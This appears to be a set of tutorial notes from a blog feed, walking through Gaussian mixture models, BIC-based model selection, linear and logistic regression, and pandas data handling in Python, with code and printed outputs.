• Then we decompose it into 3 (or a different number of) Gaussians.

• Finally, we plot the original data and the decomposed Gaussians.

• Do something similar for the 2D and 3D cases…

• Generate data, perform GMM and plot the individual components.
    from sklearn import mixture
    import matplotlib.pyplot as plt
    import numpy as np
    import scipy.stats as stats
    • Create some data

• Draw samples from different normal distributions, with different means and standard deviations, so we get data that demonstrates GMM well.
    • Concatenate to create a single data set

# 1000 points with mean 5 and std 5, plus 1000 points with mean 10 and std 2:
# concatenated, that gives a single set of 2000 points
    x = np.concatenate((np.random.normal(5, 5, 1000), np.random.normal(10, 2, 1000)))
    plt.plot(x)
    [<matplotlib.lines.Line2D at 0x1fc9d0cd7c0>]

    png

    plt.hist(x, bins=100)

    png

    f = x.reshape(-1, 1)
• We created data from two normal distributions, but for the fun of it let us decompose the data into 3 Gaussians: n_components=3.
g = mixture.GaussianMixture(n_components=3, covariance_type='full')
g.fit(f)
weights = g.weights_  # mixture weights
means = g.means_  # component means
covars = g.covariances_  # component covariances
    x_axis = x
    x_axis.sort()

    plt.hist(f, bins=100, histtype='bar', density=True, ec='red', alpha=0.5)
    plt.plot(x_axis,weights[0]*stats.norm.pdf(x_axis,means[0],np.sqrt(covars[0])).ravel(), c='red')
    plt.plot(x_axis,weights[1]*stats.norm.pdf(x_axis,means[1],np.sqrt(covars[1])).ravel(), c='green')
    plt.plot(x_axis,weights[2]*stats.norm.pdf(x_axis,means[2],np.sqrt(covars[2])).ravel(), c='blue')

    plt.grid()
    plt.show()

    png


    2D example

    from sklearn.datasets import make_blobs
    import numpy as np
    from matplotlib import pyplot as plt
    • Generate some data
X, y_true = make_blobs(n_samples=400, centers=4,
                       cluster_std=0.60, random_state=0)
X = X[:, ::-1]  # flip axes for better plotting

    rng = np.random.RandomState(13)
    X_stretched = np.dot(X, rng.randn(2, 2))
    plt.scatter(X_stretched[:, 0], X_stretched[:, 1], s=7, cmap='viridis')
    <matplotlib.collections.PathCollection at 0x1fc9eac9310>

    png

    from sklearn.mixture import GaussianMixture as GMM

    gmm = GMM(n_components=4, covariance_type='full', random_state=42)
    from matplotlib.patches import Ellipse


def draw_ellipse(position, covariance, ax=None, **kwargs):
    """Draw an ellipse with a given position and covariance."""
    ax = ax or plt.gca()

    # Convert covariance to principal axes
    if covariance.shape == (2, 2):
        U, s, Vt = np.linalg.svd(covariance)
        angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))
        width, height = 2 * np.sqrt(s)
    else:
        angle = 0
        width, height = 2 * np.sqrt(covariance)

    # Draw the ellipse at 1, 2 and 3 sigma
    for nsig in range(1, 4):
        ax.add_patch(Ellipse(position, nsig * width, nsig * height,
                             angle=angle, **kwargs))


def plot_gmm(gmm, X, label=True, ax=None):
    ax = ax or plt.gca()
    labels = gmm.fit(X).predict(X)
    if label:
        ax.scatter(X[:, 0], X[:, 1], c=labels, s=7, cmap='viridis', zorder=2)
    else:
        ax.scatter(X[:, 0], X[:, 1], s=7, zorder=2)
    ax.axis('equal')

    w_factor = 0.2 / gmm.weights_.max()
    for pos, covar, w in zip(gmm.means_, gmm.covariances_, gmm.weights_):
        draw_ellipse(pos, covar, alpha=w * w_factor)


plot_gmm(gmm, X_stretched)

    png


    3D

    import numpy as np
    from sklearn.mixture import GaussianMixture
    from matplotlib import pyplot as plt
• Generate 3D data with 4 clusters: set the Gaussian centers and covariances in 3D
means = np.array([[0.5, 0.0, 0.0],
                  [0.0, 0.0, 0.0],
                  [-0.5, -0.5, -0.5],
                  [-0.8, 0.3, 0.4]])

covs = np.array([np.diag([0.01, 0.01, 0.03]),
                 np.diag([0.08, 0.01, 0.01]),
                 np.diag([0.01, 0.05, 0.01]),
                 np.diag([0.03, 0.07, 0.01])])

n_gaussians = means.shape[0]  # number of clusters

N = 1000  # number of points to be generated for each cluster
points = []
for i in range(len(means)):
    x = np.random.multivariate_normal(means[i], covs[i], N)
    points.append(x)
points = np.concatenate(points)
    • Plot
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    ax.scatter(points[:,0], points[:,1], points[:,2], s=1, alpha=1)
    ax.view_init(35.246, 45)
    plt.show()

    png

• Fit the Gaussian mixture model
    gmm = GaussianMixture(n_components=n_gaussians, covariance_type='diag')
    gmm.fit(points)
• Functions to visualize the data
import matplotlib.cm as cmx


def plot_sphere(w=0, c=[0, 0, 0], r=[1, 1, 1], subdev=10, ax=None, sigma_multiplier=3):
    '''
    Plot a sphere surface.
    Input:
        c: 3-element list, sphere center
        r: 3-element list, sphere original scale in each axis (allows drawing ellipsoids)
        subdev: scalar, number of subdivisions (subdev^2 points sampled on the surface)
        ax: optional pyplot axis object to plot the sphere in
        sigma_multiplier: additional sphere scale (choosing an std value when plotting gaussians)
    Output:
        ax: pyplot axis object
    '''
    if ax is None:
        fig = plt.figure()
        ax = fig.add_subplot(111, projection='3d')
    pi = np.pi
    cos = np.cos
    sin = np.sin
    phi, theta = np.mgrid[0.0:pi:complex(0, subdev), 0.0:2.0 * pi:complex(0, subdev)]
    x = sigma_multiplier * r[0] * sin(phi) * cos(theta) + c[0]
    y = sigma_multiplier * r[1] * sin(phi) * sin(theta) + c[1]
    z = sigma_multiplier * r[2] * cos(phi) + c[2]
    cmap = cmx.ScalarMappable()
    cmap.set_cmap('jet')
    c = cmap.to_rgba(w)

    ax.plot_surface(x, y, z, color=c, alpha=0.2, linewidth=1)

    return ax


def visualize_3d_gmm(points, w, mu, stdev):
    '''
    Plot points and their corresponding GMM model in 3D.
    Input:
        points: N x 3, sampled points
        w: n_gaussians, gmm weights
        mu: 3 x n_gaussians, gmm means
        stdev: 3 x n_gaussians, gmm standard deviations (assuming a diagonal covariance matrix)
    Output:
        None
    '''
    n_gaussians = mu.shape[1]
    N = int(np.round(points.shape[0] / n_gaussians))
    # Visualize data
    fig = plt.figure(figsize=(8, 8))
    axes = fig.add_subplot(111, projection='3d')
    axes.set_xlim([-1, 1])
    axes.set_ylim([-1, 1])
    axes.set_zlim([-1, 1])
    plt.set_cmap('Set1')
    colors = cmx.Set1(np.linspace(0, 1, n_gaussians))
    for i in range(n_gaussians):
        idx = range(i * N, (i + 1) * N)
        axes.scatter(points[idx, 0], points[idx, 1], points[idx, 2], alpha=0.3, c=colors[i])
        plot_sphere(w=w[i], c=mu[:, i], r=stdev[:, i], ax=axes)

    plt.title('3D GMM')
    axes.set_xlabel('X')
    axes.set_ylabel('Y')
    axes.set_zlabel('Z')
    axes.view_init(35.246, 45)
    plt.show()


visualize_3d_gmm(points, gmm.weights_, gmm.means_.T, np.sqrt(gmm.covariances_).T)

    png

    53 - How to pick optimal number of parameters for your unsupervised machine learning model

    import numpy as np
    import cv2
    from matplotlib import pyplot as plt

    img = cv2.imread('images/alloy.jpg')
    img2 = img.reshape((-1, 3))
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x2650b465fd0>

    png

    from sklearn.mixture import GaussianMixture as GMM

    n_components = np.arange(1, 10)
    gmm_models = [GMM(n, covariance_type='tied').fit(img2) for n in n_components]
    plt.plot(n_components, [m.bic(img2) for m in gmm_models], label='BIC')
    plt.xlabel('n_components')
    Text(0.5, 0, 'n_components')

    png

So n = 2 is the most suitable choice here (the snippet below picks it programmatically).
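To read the optimum off the curve in code rather than by eye — a small addition of mine, reusing n_components and gmm_models from above:

bic = np.array([m.bic(img2) for m in gmm_models])
best_n = n_components[np.argmin(bic)]  # the component count with the lowest BIC
print('Best n_components by BIC:', best_n)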

    54 - Unsupervised and supervised machine learning - a reminder

A comparison of unsupervised and supervised machine learning: supervised learning fits a mapping from features to known labels (classification, regression), while unsupervised learning finds structure in unlabeled data (clustering, mixture models).

    ]]>
    @@ -8982,7 +8982,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(43-49)-Regression/ - 正文

    43 - What is machine learning anyway

• Machine Learning
  • Supervised Learning
    • Classification problem
      • Support Vector Machines
      • Discriminant Analysis
      • Naive Bayes
      • Nearest Neighbor
    • Regression
      • Linear Regression, GLM
      • SVR, GPR
      • Ensemble Methods
      • Decision Trees
      • Neural Networks
  • Unsupervised Learning
    • Clustering
      • K-Means, K-Medoids, Fuzzy C-Means
      • Hierarchical
      • Gaussian Mixture
      • Neural Networks
      • Hidden Markov Model

    • Machine Learning VS Deep Learning

png

With large amounts of data, deep learning gives better results.

    png

44 - What is linear regression

A brief introduction to linear regression and its loss function; the standard form of the loss is given below.

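For reference, the quantity being minimized is the mean squared error between the fitted line and the data (the standard definition, stated here explicitly):

$$J(m,c)=\frac{1}{n}\sum_{i=1}^{n}\left(y_i-(mx_i+c)\right)^2$$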
    45 - Linear regression using Sci-Kit Learn in Python

    import pandas as pd
    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import linear_model

    df = pd.read_csv('data/cells.csv')
    df
    time cells
    0 0.0 205
    1 0.5 225
    2 1.0 238
    3 1.5 240
    4 2.0 248
    5 2.5 260
    6 3.0 265
    7 3.5 283
    8 4.0 301
    9 4.5 305
    10 5.0 309
    plt.xlabel('time')
    plt.ylabel('cells')
    plt.scatter(df.time, df.cells, color='red', marker='+')
    <matplotlib.collections.PathCollection at 0x2c7bd4eb0d0>

    png

    • x independent (time)

    • y dependent - we are predicting Y

    x_df = df[['time']]
    x_df
    time
    0 0.0
    1 0.5
    2 1.0
    3 1.5
    4 2.0
    5 2.5
    6 3.0
    7 3.5
    8 4.0
    9 4.5
    10 5.0
    x_df.dtypes
time    float64
dtype: object
    y_df = df.cells
• Create and train the model
    reg = linear_model.LinearRegression()  # Create an instance of the model
    reg.fit(x_df, y_df) # Training the model (fitting a line)
• Make a prediction
    # Predict
    reg.predict([[2.3]])
C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names  warnings.warn(
array([257.61090909])
• Score the model (R²)
    reg.score(x_df, y_df)
    0.9784252641866715
    • Y = mx + C
    c = reg.intercept_
    m = reg.coef_
    2.3 * m + c
    array([257.61090909])
• Predict multiple values
    cells_predict_df = pd.read_csv('data/cells_predict.csv')
    cells_predict_df.head()
    time
    0 0.1
    1 0.2
    2 0.3
    3 0.4
    4 0.5
    predicted_cells = reg.predict(cells_predict_df)
    predicted_cells
array([212.33090909, 214.38909091, 216.44727273, 218.50545455,
       220.56363636, 222.62181818, 224.68      , 226.73818182,
       228.79636364, 230.85454545, 232.91272727, 234.97090909,
       237.02909091, 239.08727273, 241.14545455, 243.20363636,
       245.26181818, 247.32      , 249.37818182, 251.43636364,
       253.49454545, 255.55272727, 257.61090909, 259.66909091,
       261.72727273, 263.78545455, 265.84363636, 267.90181818,
       269.96      , 272.01818182, 274.07636364, 276.13454545,
       278.19272727, 280.25090909, 282.30909091, 284.36727273,
       286.42545455, 288.48363636, 290.54181818, 292.6       ])
• Merge the predictions into the table and save them
    cells_predict_df['cells'] = predicted_cells
    cells_predict_df.head()
    time cells
    0 0.1 212.330909
    1 0.2 214.389091
    2 0.3 216.447273
    3 0.4 218.505455
    4 0.5 220.563636
    cells_predict_df.to_csv('predicted_cells.csv')

    46 - Splitting data into training and testing sets for machine learning

    import pandas as pd
    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import linear_model
    df = pd.read_csv('data/cells.csv')
    df
    time cells
    0 0.0 205
    1 0.5 225
    2 1.0 238
    3 1.5 240
    4 2.0 248
    5 2.5 260
    6 3.0 265
    7 3.5 283
    8 4.0 301
    9 4.5 305
    10 5.0 309
    x_df = df.drop('cells', axis='columns')
    y_df = df.cells
• Split the data into a training set (train) and a test set (test)
    from sklearn.model_selection import train_test_split

    X_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.4, random_state=10)
    X_train
    time
    10 5.0
    3 1.5
    1 0.5
    0 0.0
    4 2.0
    9 4.5
    reg = linear_model.LinearRegression()
    reg.fit(X_train, y_train)

    prediction_test = reg.predict(X_test)
    prediction_test
array([229.66081871, 270.73684211, 291.2748538 , 260.46783626,
       281.00584795])
• Compute the mean squared error
# note: as written this squares the mean residual; the usual MSE would be np.mean((prediction_test - y_test) ** 2)
print('Mean sq. error between y_test and predicted =', np.mean(prediction_test - y_test) ** 2)
    Mean sq. error between y_test and predicted = 7.677112273861912
• Plot the residuals
    plt.scatter(prediction_test, prediction_test - y_test)
plt.hlines(y=0, xmin=200, xmax=310)  # draw a horizontal line
    <matplotlib.collections.LineCollection at 0x26a2470d640>

    png

    47 - Multiple Linear Regression with SciKit-Learn in Python

    import pandas as pd

    df = pd.read_excel('data/images_analyzed.xlsx')
    df.head()
    User Time Coffee Age Images_Analyzed
    0 1 8 0 23 20
    1 1 13 0 23 14
    2 1 17 0 23 18
    3 1 22 0 23 15
    4 1 8 2 23 22
    import seaborn as sns

    sns.lmplot(x='Time', y='Images_Analyzed', data=df, hue='Age')
    <seaborn.axisgrid.FacetGrid at 0x238adc47910>

    png

    import numpy as np
    from sklearn import linear_model

    reg = linear_model.LinearRegression()
    reg.fit(df[['Time', 'Coffee', 'Age']], df.Images_Analyzed)

    reg.coef_, reg.intercept_
    (array([-0.35642282, -0.3475    , -0.04279945]), 25.189636192124166)
    reg.predict([[13, 2, 23]])
C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names  warnings.warn(
array([18.8767522])

    48 - What is logistic regression

Although it is called regression, logistic regression is mainly used for classification (binary classification problems); the key formula is given below.

    逻辑回归(Logistic Regression)(一) - 知乎 (zhihu.com)
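The core of the model is the logistic (sigmoid) function, which squashes a linear score into a probability (standard definition, added here for reference):

$$\sigma(z)=\frac{1}{1+e^{-z}},\qquad P(y=1\mid x)=\sigma(w^\top x+b)$$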

    49 - Logistic Regression using scikit-learn in Python

    • STEP1: DATA READING AND UNDERSTANDING
    import pandas as pd
    from matplotlib import pyplot as plt

    df = pd.read_csv('data/images_analyzed_productivity1.csv')
    df.head()
    User Time Coffee Age Images_Analyzed Productivity
    0 1 8 0 23 20 Good
    1 1 13 0 23 14 Bad
    2 1 17 0 23 18 Good
    3 1 22 0 23 15 Bad
    4 1 8 2 23 22 Good
    plt.scatter(df.Time, df.Productivity, marker='+', color='red')
    <matplotlib.collections.PathCollection at 0x206c9140bb0>

    png

    sizes = df['Productivity'].value_counts(sort=1)
    plt.pie(sizes, autopct='%1.1f%%')
    ([<matplotlib.patches.Wedge at 0x206cc3afb80>,  <matplotlib.patches.Wedge at 0x206cc3b9310>], [Text(-0.08630492316306847, 1.096609073570804, ''),  Text(0.08630482049111692, -1.0966090816512493, '')], [Text(-0.04707541263440097, 0.598150403765893, '52.5%'),  Text(0.04707535663151831, -0.5981504081734086, '47.5%')])

    png

• STEP2: DROP IRRELEVANT DATA
    df.drop(['Images_Analyzed'], axis=1, inplace=True)
    df.drop(['User'], axis=1, inplace=True)
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 Good
    1 13 0 23 Bad
    2 17 0 23 Good
    3 22 0 23 Bad
    4 8 2 23 Good
• STEP3: DEAL WITH MISSING VALUES
    df = df.dropna()
    • STEP4: CONVERT NON-NUMERIC TO NUMERIC

Replace Good and Bad with numeric values that the model can work with.

df.Productivity[df.Productivity == 'Good'] = 1  # chained assignment; df.loc[df.Productivity == 'Good', 'Productivity'] = 1 is the safer idiom
df.Productivity[df.Productivity == 'Bad'] = 2
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 1
    1 13 0 23 2
    2 17 0 23 1
    3 22 0 23 2
    4 8 2 23 1
• STEP 5: PREPARE THE DATA (define indep/dep variables)
    Y = df['Productivity'].values
    Y = Y.astype('int')
    Y
array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,
       1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,
       1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,
       1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])
    X = df.drop(labels=['Productivity'], axis=1)
    X.head()
    Time Coffee Age
    0 8 0 23
    1 13 0 23
    2 17 0 23
    3 22 0 23
    4 8 2 23
    • STEP 6: SPLIT DATA
    from sklearn.model_selection import train_test_split

    X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=20)
    X_train.head()
    Time Coffee Age
    42 18 4 31
    5 13 2 23
    54 17 2 45
    12 8 6 23
    78 17 6 52
    • STEP 7: DEFINE THE MODEL
    from sklearn.linear_model import LogisticRegression

    model = LogisticRegression()
    model.fit(X_train, y_train)
    • STEP 8: TESTING THE MODEL
    prediction_test = model.predict(X_test)
    prediction_test
    array([2, 2, 2, 1, 1, 2, 1, 2])
• STEP 9: VERIFY THE ACCURACY
    from sklearn import metrics

    print('Accuracy =', metrics.accuracy_score(y_test, prediction_test))
    Accuracy = 0.75
    • STEP 10: WEIGHTS
    model.coef_
    array([[0.18788991, 0.19204588, 0.0200644 ]])
    weights = pd.Series(model.coef_[0], index=X.columns.values)
    weights
Time      0.187890
Coffee    0.192046
Age       0.020064
dtype: float64
    ]]>
    @@ -9009,7 +9009,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(36-42)-Pandas/ - 正文

    36 - Introduction to Pandas - Data reading and handling

• Plot a histogram
    import pandas as pd

    df = pd.read_csv('images/grains/grain_measurements.csv')
    df['Area'].plot(kind='hist', title='Area', bins=50)
    <AxesSubplot:title={'center':'Area'}, ylabel='Frequency'>

    png

• Create a DataFrame and set the index and columns
data = [[10, 200, 60],
        [12, 155, 45],
        [9, 50, -45.],
        [16, 240, 90]]

    df = pd.DataFrame(data, index=[1, 2, 3, 4], columns=['Area', 'Intensity', 'Orientation'])
    df
    Area Intensity Orientation
    1 10 200 60.0
    2 12 155 45.0
    3 9 50 -45.0
    4 16 240 90.0

    png

• Inspect the columns for missing values
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 100 entries, 0 to 99
Data columns (total 7 columns):
 #   Column      Non-Null Count  Dtype
---  ------      --------------  -----
 0   Unnamed: 0  100 non-null    object
 1   Image       100 non-null    object
 2   Manual      94 non-null     float64
 3   Manual2     3 non-null      float64
 4   Auto_th_2   100 non-null    int64
 5   Auto_th_3   100 non-null    int64
 6   Auto_th_4   100 non-null    int64
dtypes: float64(2), int64(3), object(2)
memory usage: 5.6+ KB
• Check the number of rows and columns
    df.shape
    (100, 7)
• View the whole table
    df
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    ... ... ... ... ... ... ... ...
    95 Set4 Image96 106.0 NaN 75 112 98
    96 Set4 Image97 80.0 NaN 66 80 88
    97 Set4 Image98 92.0 NaN 73 93 95
    98 Set4 Image99 116.0 NaN 101 115 93
    99 Set4 Image100 99.0 NaN 77 106 102

    100 rows × 7 columns

• View the first 7 rows
    df.head(7)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
• View the last 7 rows
    df.tail(7)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    93 Set4 Image94 81.0 NaN 65 90 70
    94 Set4 Image95 NaN NaN 104 122 88
    95 Set4 Image96 106.0 NaN 75 112 98
    96 Set4 Image97 80.0 NaN 66 80 88
    97 Set4 Image98 92.0 NaN 73 93 95
    98 Set4 Image99 116.0 NaN 101 115 93
    99 Set4 Image100 99.0 NaN 77 106 102
• Set a column as the index
    df1 = df.set_index('Image')
    df1.head()
    Unnamed: 0 Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    Image
    Image1 Set1 92.0 93.0 70 87 82
    Image2 Set1 87.0 83.0 60 85 83
    Image3 Set1 104.0 98.0 74 99 94
    Image4 Set1 99.0 NaN 73 101 109
    Image5 Set1 89.0 NaN 59 90 67
• View the column names
    df1.columns
Index(['Unnamed: 0', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3', 'Auto_th_4'], dtype='object')
• List the unique values
    df['Unnamed: 0'].unique()
    array(['Set1', 'Set2', 'Set3', 'Set4'], dtype=object)
• Rename a column
    df1 = df.rename(columns={'Unnamed: 0': 'Image_set'})
    df1.columns
Index(['Image_set', 'Image', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3', 'Auto_th_4'], dtype='object')
• Show the data types
    df.dtypes
Unnamed: 0     object
Image          object
Manual        float64
Manual2       float64
Auto_th_2       int64
Auto_th_3       int64
Auto_th_4       int64
dtype: object
• Show summary statistics
    df.describe()
    Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    count 94.000000 3.000000 100.000000 100.000000 100.000000
    mean 100.021277 91.333333 76.370000 97.580000 93.210000
    std 11.285140 7.637626 11.971055 12.327337 14.128769
    min 80.000000 83.000000 55.000000 71.000000 63.000000
    25% 90.250000 88.000000 67.750000 89.500000 83.750000
    50% 101.000000 93.000000 74.500000 98.500000 93.000000
    75% 108.000000 95.500000 85.000000 106.000000 103.250000
    max 120.000000 98.000000 109.000000 124.000000 129.000000

    37 - Introduction to Pandas - Data Manipulation

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
• Drop a column
    df1 = df.drop('Manual2', axis=1)
    df1.head()
    Unnamed: 0 Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
• Drop multiple columns
    df2 = df.drop(['Manual2', 'Auto_th_2'], axis=1)
    df2.head()
    Unnamed: 0 Image Manual Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 87 82
    1 Set1 Image2 87.0 85 83
    2 Set1 Image3 104.0 99 94
    3 Set1 Image4 99.0 101 109
    4 Set1 Image5 89.0 90 67
• Add a new column and fill it
    df['Date'] = '2019-06-24'
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    1 Set1 Image2 87.0 83.0 60 85 83 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    df.dtypes
    Unnamed: 0     object
    Image          object
    Manual        float64
    Manual2       float64
    Auto_th_2       int64
    Auto_th_3       int64
    Auto_th_4       int64
    Date           object
    dtype: object
    • Convert strings to datetimes
    df['Date'] = pd.to_datetime('2019-06-24')
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    1 Set1 Image2 87.0 83.0 60 85 83 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    df.dtypes
    Unnamed: 0            object
    Image                 object
    Manual               float64
    Manual2              float64
    Auto_th_2              int64
    Auto_th_3              int64
    Auto_th_4              int64
    Date          datetime64[ns]
    dtype: object
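    pd.to_datetime also parses whole string columns; a hedged sketch (the format string is an assumption matching the dates above):
    df['Date'] = pd.to_datetime(df['Date'], format='%Y-%m-%d')  # parse an existing string column in place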
    • Save to a .csv file
    df.to_csv('data/manual_vs_auto_updated.csv')
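    Note that to_csv writes the row index as an extra, header-less column by default, and read_csv displays any header-less column as 'Unnamed: <n>'. A minimal sketch of the usual fixes:
    df.to_csv('data/manual_vs_auto_updated.csv', index=False)          # don't write the index at all
    df = pd.read_csv('data/manual_vs_auto_updated.csv', index_col=0)   # or treat column 0 as the index when reading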
    • Drop a row
    df1 = df.drop(df.index[1])
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    5 Set1 Image6 115.0 NaN 82 124 105 2019-06-24
    • Drop the first 10 rows (keep rows 10 onward)
    df1 = df.iloc[10:]
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    10 Set1 Image11 91.0 NaN 61 87 77 2019-06-24
    11 Set1 Image12 119.0 NaN 79 105 111 2019-06-24
    12 Set1 Image13 NaN NaN 65 90 84 2019-06-24
    13 Set1 Image14 117.0 NaN 94 115 105 2019-06-24
    14 Set1 Image15 91.0 NaN 66 99 70 2019-06-24
    • Select certain rows
    df1 = df[df['Unnamed: 0'] != 'Set1']
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    25 Set2 Image26 102.0 NaN 85 103 105 2019-06-24
    26 Set2 Image27 93.0 NaN 76 84 98 2019-06-24
    27 Set2 Image28 83.0 NaN 62 71 87 2019-06-24
    28 Set2 Image29 110.0 NaN 92 117 85 2019-06-24
    29 Set2 Image30 89.0 NaN 70 96 81 2019-06-24

    38 - Introduction to Pandas - Data Sorting

    • Sorting
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df2 = df.sort_values('Manual', ascending=True)  # ascending=True: sort from smallest to largest
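    Two related options worth knowing (standard sort_values keywords, shown as a sketch); NaN values are placed last by default, as the output below confirms:
    df3 = df.sort_values('Manual', ascending=False)      # descending
    df4 = df.sort_values('Manual', na_position='first')  # NaNs first instead of last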
    • Select specific rows/columns
    df2[['Manual', 'Auto_th_2']]
    Manual Auto_th_2
    34 80.0 58
    96 80.0 66
    93 81.0 65
    66 81.0 65
    44 82.0 67
    ... ... ...
    32 NaN 66
    59 NaN 74
    79 NaN 69
    82 NaN 64
    94 NaN 104

    100 rows × 2 columns

    df[20: 30]
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    20 Set1 Image21 89.0 NaN 65 94 86
    21 Set1 Image22 88.0 NaN 66 96 83
    22 Set1 Image23 106.0 NaN 71 112 105
    23 Set1 Image24 107.0 NaN 92 91 111
    24 Set1 Image25 108.0 NaN 93 113 115
    25 Set2 Image26 102.0 NaN 85 103 105
    26 Set2 Image27 93.0 NaN 76 84 98
    27 Set2 Image28 83.0 NaN 62 71 87
    28 Set2 Image29 110.0 NaN 92 117 85
    29 Set2 Image30 89.0 NaN 70 96 81
    • The loc method looks up values by row and column names (labels).

    Pandas 读取某列、某行数据——loc、iloc 用法总结_子木同学的博客-CSDN 博客_pandas iloc

    df.loc[20: 30, ['Manual', 'Auto_th_2']]
    Manual Auto_th_2
    20 89.0 65
    21 88.0 66
    22 106.0 71
    23 107.0 92
    24 108.0 93
    25 102.0 85
    26 93.0 76
    27 83.0 62
    28 110.0 92
    29 89.0 70
    30 115.0 77
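    Note that label-based loc slices are end-inclusive, which is why df.loc[20: 30, ...] returns 11 rows while the position-based df[20: 30] above returned 10. A minimal sketch of the contrast:
    df.loc[20:30, ['Manual', 'Auto_th_2']]  # labels 20..30, inclusive -> 11 rows
    df.iloc[20:30, [2, 4]]                  # positions 20..29, end-exclusive -> 10 rows (Manual is column 2, Auto_th_2 is column 4)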
    set2_df = df[df['Unnamed: 0'] == 'Set2']
    set2_df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    25 Set2 Image26 102.0 NaN 85 103 105
    26 Set2 Image27 93.0 NaN 76 84 98
    27 Set2 Image28 83.0 NaN 62 71 87
    28 Set2 Image29 110.0 NaN 92 117 85
    29 Set2 Image30 89.0 NaN 70 96 81
    • Select the maximum value
    max(set2_df['Manual'])
    120.0
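    Python's built-in max does not skip NaN, so the pandas method (NaN-aware by default) is the safer idiom here:
    set2_df['Manual'].max()  # 120.0, ignoring the missing values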
    • Select values by a condition
    df['Manual'] > 100
    0     False
    1     False
    2      True
    3     False
    4     False
          ...
    95     True
    96    False
    97    False
    98     True
    99    False
    Name: Manual, Length: 100, dtype: bool
    df[df['Manual'] > 100].head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    2 Set1 Image3 104.0 98.0 74 99 94
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    • Compound conditions
    df[(df['Manual'] > 100) & (df['Auto_th_2'] < 100)].head()
